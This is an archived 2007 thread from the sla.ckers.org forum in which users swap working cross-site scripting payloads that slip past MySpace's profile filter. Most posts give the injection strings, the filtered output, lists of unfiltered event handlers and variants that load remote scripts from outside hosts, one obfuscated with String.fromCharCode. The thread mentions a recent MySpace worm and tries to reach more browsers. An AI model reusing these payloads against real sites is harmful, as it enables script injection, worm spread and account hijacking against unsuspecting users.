Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
MySpace 0day Again^6
Posted by: digi7al64
Date: January 11, 2007 07:22PM

Ok, so myspace took the initiative and removed all the event handlers which we have been using against them so successfully. And the worm that was released some 2 days ago has been patched (as it relied on the onload statement)

So i guess myspace devs would be feeling good atm. ain't nobody ever going to use other event element against them again. And as for the firefox non-alpha non-digit XSS vector, meh say goodbye to that also.

Well let me just this...wrong

<img stp='<embed ' srcsrc="http://imaqeshack.us/pix.gif"="http://imaqeshack.us/pix.gif" <scrisrc="y"pt/ src=//ha.ckers.org/s.js?</ssrc="y"cript>

is filtered into this
<img stp='<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://imaqeshack.us/pix.gif" ' src="http://imaqeshack.us/pix.gif" <script/ src=//ha.ckers.org/s.js?</script></style>

I win again!

This time i acheived pwnage using (once again) there own filtering system that removed src= when it is contained in certain postions. The problem i had here was that as soon as i closed the first <script> tag the filter then ceased to work meaning the closing </script> tag would fail which meant the vector wouldn't work.

Then remembered the xss cheat sheet and the non-alpha non-digit XSS vector in script tags... so i simply used that instead, got the closing </script> tag and bang it works again.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/11/2007 07:23PM by digi7al64.

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: Ghozt
Date: January 11, 2007 07:39PM

Damnit, you beat me.

Well, I found a way to make <body ....onload="alert('Blah')"> work..
<BODY onmouseenteronmouseleaveonload="alert('asdf')">

But 4 periods in front of it don't work.. I also found a large list of events that Microsoft made (quite a few aren't filtered at all in Myspace), take a look: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/events.asp .

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: Ghozt
Date: January 11, 2007 08:12PM

Ok, I was wrong. Only 5 aren't filtered:
oncut
ondataavailable
ondatasetchanged
ondatasetcomplete
ondrag
Anyways, another great find digital.

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 08:54PM

digi7al64 - i am going to refer to you as god from now on
;]

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 09:18PM

digi7al64 Wrote:
-------------------------------------------------------
> Ok, so myspace took the initiative and removed all
> the event handlers which we have been using
> against them so successfully. And the worm that
> was released some 2 days ago has been patched (as
> it relied on the onload statement)
>
> So i guess myspace devs would be feeling good atm.
> ain't nobody ever going to use other event element
> against them again. And as for the firefox
> non-alpha non-digit XSS vector, meh say goodbye to
> that also.
>
> Well let me just this...wrong
>
>
>
> is filtered into this
>
>
> I win again!
>
> This time i acheived pwnage using (once again)
> there own filtering system that removed src= when
> it is contained in certain postions. The problem i
> had here was that as soon as i closed the first
> tag the filter then ceased to work meaning the
> closing tag would fail which meant the vector
> wouldn't work.
>
> Then remembered the xss cheat sheet and the
> non-alpha non-digit XSS vector in script tags...
> so i simply used that instead, got the closing
> tag and bang it works again.


Thanks! I've got it working on Firefox, but that does me no good really. Is there a way to make it work on IE too?

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 09:19PM

Ghozt Wrote:
-------------------------------------------------------
> Damnit, you beat me.
>
> Well, I found a way to make work..
>
>
> But 4 periods in front of it don't work.. I also
> found a large list of events that Microsoft made
> (quite a few aren't filtered at all in Myspace),
> take a look:
> http://msdn.microsoft.com/library/default.asp?url=
> /workshop/author/dhtml/reference/events.asp .

Thanks! I've got it working on Firefox, but that does me no good really. Is there a way to make it work on IE too?

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: digi7al64
Date: January 11, 2007 09:26PM

not this particular vector as it doesn't effect IE users... sorry.

however. i am working on a completely different vector that hopefully should be cross browser compatible and i will post it when i get it working (fingers crossed) and providing the patching for this vector doesn't destroy it :(

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: OrbityBaby
Date: January 11, 2007 09:34PM

Great, thank you. I'll keep looking back for it. ;)

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: Lockdown
Date: January 11, 2007 11:43PM

Again? Dude, myspace needs you on their payroll. But then again, so does every other site. Hell... the internet needs you on its payroll.

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: eyeced
Date: January 12, 2007 03:23PM

This is very close to the xss used by profiletracker, i think digital should give them a degree of credit.

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: bubbles
Date: January 12, 2007 03:48PM

The code used by profiletracker was patched. And he just changed it a little so it works again, I think its them who should be thanking him :)

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: Lockdown
Date: January 12, 2007 11:21PM

The src ?</script> kinda screws stuff up doesn't it? Or maybe the exploit got patched already

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: r0xes
Date: January 13, 2007 01:06PM

I was just passing through the world today, you know, surfing the interwebz and all that fun stuff...
and I came across this page.

Well, I took about three minutes to go tinker, and whala! I have got this vector working in Firefox successfully. I'm doing a tiny bit more testing while writing this post, in an attempt to get it to work in Internet Explorer.

I've probably made this more complicated than it needs to be..however, without being able to see MySpace's 3 lines of "XSS filtering", I'm not going to waste my time with making it really small [=

(NOTE!) I had this working about...10 minutes ago on Firefox and Opera. However, the _exact_ vector I was using was lost when I was attempting to add a bit more, and the next page return I accidentally copied the result again rather than the vector, so oh, fuck me.

(Still working, there's a lot of time passing right now..lol)

Okay. I wasn't really looking about five minutes ago when I started this post, but now I'm interested.
Apparently, this is working because of a script tag that is right after the "Interests" section, so the result looks like this:

"<script/ src='http://ha.ckers.org/s.js' >../_onload_='src="y"> '></td></tr><script language="JavaScript">highlightInterests("ProfileGeneral");</script>"
Since Firefox doesn't shit on me when this happens, it's all good.

Still haven't figured out getting this working with Internet Exploder. I will later, as I don't have much time now.

G'day all!


Teh simply modified vector:
<img stp='<embed ' srcsrc="http://imaqeshack.us/pix.gif"="http://imaqeshack.us/pix.gif" <scrisrc="y"pt/ src='http://ha.ckers.org/s.js'ssrc="y"rc='http://ha.ckers.org/s.js'? src='http://ha.ckers.org/s.js'?></script/onload_='src="y"> '>


~r0xes

lawlerskates and lmao missielz
http://www.r0xes.net / http://www.7na.org



Edited 1 time(s). Last edit at 01/13/2007 01:07PM by r0xes.

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: digi7al64
Date: January 13, 2007 09:26PM

@r0xes

try working with

<img stp='<embed ' srcsrc="http://k.us/pix.gif"="http://k.us/pix.gif" <scrisrc="y"pt>alert('xss'); var e='<embed srcsrc="http://k.us/pix.gif"="http://k.us/pix.gif" ';</ssrc="y"cript>

which will be parsed as

<img stp="&lt;embed allowScriptAccess=&quot;never&quot; allowNetworking=&quot;internal&quot; enableJSURL=&quot;false&quot; enableHREF=&quot;false&quot; saveEmbedTags=&quot;true&quot; src=&quot;http://k.us/pix.gif&quot; " src="http://k.us/pix.gif"><script>alert('xss'); var e='<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://k.us/pix.gif" src="http://k.us/pix.gif" ';</script>

which gives you opening and closing <script> tags! unfortunately i can't as yet get it to fire in IE... and its the weekend so i'm spending time with my girl... so I pass the flame on to you guys to help get this working in IE.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: Spikeman
Date: January 14, 2007 05:13PM

Do you happen to have a list of everything MySpace filters and what they turn into? It may come in handy.

Options: ReplyQuote
Re: MySpace 0day Again^6
Posted by: Spikeman
Date: January 14, 2007 06:17PM

I'm not posting this in a new topic because it will probably be fixed if they fix yours:

<img x='<embed src="http://.gif"'<ifrasrc="x"me srcsrc="x"=javascsrc="x"ript:document.body.innersrc="x"HTML+='<scrip'+String.fromCharCode(116,32)+'s'+'rc=http://www.fileden.com/files/2006/11/27/428255/xss.txt'+String.fromCharCode(62)+'</scrip'+String.fromCharCode(116,62) />

The cool thing about this is it works in all browsers (at least in theory, I haven't tested it in all of them). I didn't use s.js because it loads in an iframe, but I'm sure if you wanted to you could break out of the frame.

Options: ReplyQuote


Sorry, only registered users may post in this forum.